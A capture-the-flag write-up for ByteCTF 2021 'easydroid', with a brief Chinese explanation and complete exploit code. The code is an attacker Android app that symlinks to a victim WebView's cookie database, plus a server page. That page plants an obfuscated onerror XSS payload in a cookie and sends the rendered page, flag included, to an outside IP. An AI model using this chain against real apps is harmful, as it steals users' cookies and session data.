
bytectf2021_easydroid

URL 校验不充分：从绕过方式推断，目标应用只检查了 host 中是否含有 toutiao.com 这一子串/后缀，而没有对完整 host 做精确比对（代码里还残留了一次 `http://192.3.81.102#toutiao.com/` 这种用 fragment 混淆的尝试）。我们注册了 ha1vktoutiao.com 并将其解析到自己的服务器，这样既能通过校验，又能让目标应用的 WebView 加载我们完全可控的页面。

TestActivity 中的 WebView 开启了 JavaScript，并且会加载 Intent 的 `url` extra 指定的地址（利用链依赖它能打开 file:// 路径）；而 Flag 存储在目标应用 WebView 的 Cookie 数据库（app_webview/Cookies，SQLite 文件）里。

利用软链接在我们自己应用的数据目录下创建一个 symlink.html 指向目标应用的 Cookies 数据库（并把数据目录 chmod 777，让目标进程能够穿越到这个链接）。然后在目标 WebView 加载我们自己的网页时，先通过 document.cookie 往 Cookie 里注入一段 XSS payload；等 Cookie 落盘后，再用 intent: URL 让 TestActivity 以 file:// 打开 symlink.html，Cookie 数据库就会被当作 HTML 渲染，payload 中的 onerror 执行，把整个页面内容（含 Flag）外带到我们的服务器。
MainActivity.java

package com.bytectf.pwneasydroid;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.util.Log;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.EditText;
import android.widget.Toast;
import java.io.IOException;
import java.net.URISyntaxException;
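/**
 * Attacker-side activity for bytectf2021 easydroid.
 *
 * Chain: (1) create {@code <our dataDir>/symlink.html} pointing at the victim
 * WebView's cookie SQLite file and make our data dir world-traversable;
 * (2) launch the victim's MainActivity with an attacker URL whose host ends in
 * "toutiao.com", which passes the victim's URL check; (3) the served page
 * (index.html) plants an XSS payload in a cookie and later navigates to an
 * intent: URL that makes the victim's TestActivity open symlink.html via
 * file://, so the cookie DB is rendered as HTML and the payload exfiltrates it.
 */
public class MainActivity extends Activity {
    private static final String TAG = "pwneasydroid";

    /** Victim package and the two activities this exploit drives. */
    private static final String VICTIM_PKG = "com.bytectf.easydroid";
    private static final String VICTIM_MAIN = "com.bytectf.easydroid.MainActivity";
    private static final String VICTIM_TEST = "com.bytectf.easydroid.TestActivity";

    /** Attacker-controlled host; registered so that it satisfies the victim's host check. */
    private static final String ATTACKER_URL = "http://www.ha1vktoutiao.com";

    /**
     * Victim WebView cookie store that holds the flag.
     * NOTE(review): newer WebView builds keep the profile under
     * app_webview/Default/Cookies — confirm the path on the target device.
     */
    private static final String VICTIM_COOKIES =
            "/data/data/com.bytectf.easydroid/app_webview/Cookies";

    /** Delay before kicking the victim, in ms. */
    private static final long LAUNCH_DELAY_MS = 5000;

    /**
     * Stage 1: prepare the symlink, then hand the attacker URL to the victim's
     * MainActivity as intent data.
     *
     * @param savedInstanceState unused; passed through to the superclass
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        symlink();
        Intent victim = new Intent();
        victim.setClassName(VICTIM_PKG, VICTIM_MAIN);
        victim.setData(Uri.parse(ATTACKER_URL));
        // Presumably gives the symlink/chmod a moment to settle before the victim
        // starts — the delay value is arbitrary; TODO confirm it is needed at all.
        new Handler().postDelayed(() -> startActivity(victim), LAUNCH_DELAY_MS);
    }

    /**
     * Development helper, not called at runtime: builds the intent TestActivity
     * expects and logs its intent: URI form. That string is what index.html's
     * getflag() navigates to. An earlier attempt apparently tried a fragment
     * trick ("http://192.3.81.102#toutiao.com/") against the URL check; the
     * registered-domain approach is what the chain uses.
     *
     * @param url value for the "url" extra that TestActivity loads in its WebView
     */
    private void launch(String url) {
        Intent i = new Intent();
        i.setClassName(VICTIM_PKG, VICTIM_TEST);
        i.putExtra("url", url);
        // Encodes as launchFlags=0x10008000 in the intent: URI.
        i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
        String intentUri = i.toUri(Intent.URI_INTENT_SCHEME);
        Log.d(TAG, "intent uri for TestActivity: " + intentUri);
    }

    /**
     * Creates {@code <dataDir>/symlink.html -> VICTIM_COOKIES} and makes our
     * data dir world-readable/traversable so the victim process can follow the
     * link from a file:// URL.
     *
     * @return absolute path of the created symlink
     * @throws IllegalStateException if {@code ln -s} does not succeed (without
     *         the link the rest of the chain cannot work)
     * @throws RuntimeException if a command cannot be started or the thread is
     *         interrupted while waiting for it
     */
    private String symlink() {
        String root = getApplicationInfo().dataDir;
        String link = root + "/symlink.html";
        try {
            // A stale link from an earlier run may or may not exist; rm's status is irrelevant.
            run("rm", link);
            if (run("ln", "-s", VICTIM_COOKIES, link) != 0) {
                throw new IllegalStateException("ln -s " + VICTIM_COOKIES + " " + link + " failed");
            }
            // Best effort: the victim only needs to traverse into our dir and read the link.
            if (run("chmod", "-R", "777", root) != 0) {
                Log.w(TAG, "chmod -R 777 " + root + " returned non-zero; victim may not reach " + link);
            }
            return link;
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new RuntimeException("interrupted while preparing " + link, e);
        } catch (IOException e) {
            throw new RuntimeException("failed to prepare " + link, e);
        }
    }

    /**
     * Runs {@code argv} directly (no shell, no string splitting) and waits for it.
     *
     * @param argv program and its arguments, one element each
     * @return the process exit status
     * @throws IOException if the program cannot be started
     * @throws InterruptedException if interrupted while waiting
     */
    private static int run(String... argv) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        try {
            return p.waitFor();
        } finally {
            p.destroy();
        }
    }
}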

AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Attacker app for bytectf2021 easydroid. Only the launcher activity is declared;
     the victim activities are reached by explicit component name from MainActivity.java. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.bytectf.pwneasydroid" >
<!-- Needed because the served page is fetched over plain http. -->
<uses-permission android:name="android.permission.INTERNET" />
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
<!-- The attacker URL and the exfil endpoint in index.html are both http://, not https://. -->
android:usesCleartextTraffic="true"
android:supportsRtl="true" >
<activity
android:name=".MainActivity"
android:exported="true" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>

服务器端的index.html

<!DOCTYPE html>
<!-- Served from the attacker host (www.ha1vktoutiao.com) and loaded by the victim's WebView.
     Stage 2: plant the XSS payload as a cookie. Stage 3 (getflag below): have the victim's
     TestActivity open our symlink.html via file://, which renders the cookie DB as HTML. -->
<html>
<head>
<meta charset="utf-8">
<title>PWN</title>
<!-- The cookie value is an <img> whose onerror runs a base64+URI-encoded payload. Decoded it is:
       new Image().src = "http://192.3.81.102/?cookie=" + window.btoa(encodeURI(document.getElementsByTagName("html")[0].innerHTML));
     i.e. it exfiltrates the whole rendered page (the cookie DB, flag included) to the attacker server.
     Presumably the double encoding keeps quotes/semicolons out of the stored cookie value; unverified. -->
<script>document.cookie = "x = '<img src=\"x\" onerror=\"eval(decodeURI(atob('bmV3JTIwSW1hZ2UoKS5zcmMlMjA9JTIwJTIyaHR0cDovLzE5Mi4zLjgxLjEwMi8/Y29va2llPSUyMiUyMCslMjB3aW5kb3cuYnRvYShlbmNvZGVVUkkoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJTIyaHRtbCUyMiklNUIwJTVELmlubmVySFRNTCkpOw==')))\">'"</script>
</head>
<body>
<script>
// Navigates to an intent: URL targeting the victim's TestActivity with
// S.url = file:///data/user/0/com.bytectf.pwneasydroid/symlink.html (the link created by
// MainActivity.symlink()). launchFlags=0x10008000 is NEW_TASK | CLEAR_TASK.
function getflag() {
window.location = "intent:#Intent;launchFlags=0x10008000;component=com.bytectf.easydroid/.TestActivity;S.url=file%3A%2F%2F%2Fdata%2Fuser%2F0%2Fcom.bytectf.pwneasydroid%2Fsymlink.html;end";
}
// 25 s delay: presumably waits for the cookie to be flushed to the SQLite file before the
// victim opens it — the value is arbitrary; TODO confirm the minimum that works.
setTimeout("getflag()",25000);
</script>
</body>
</html>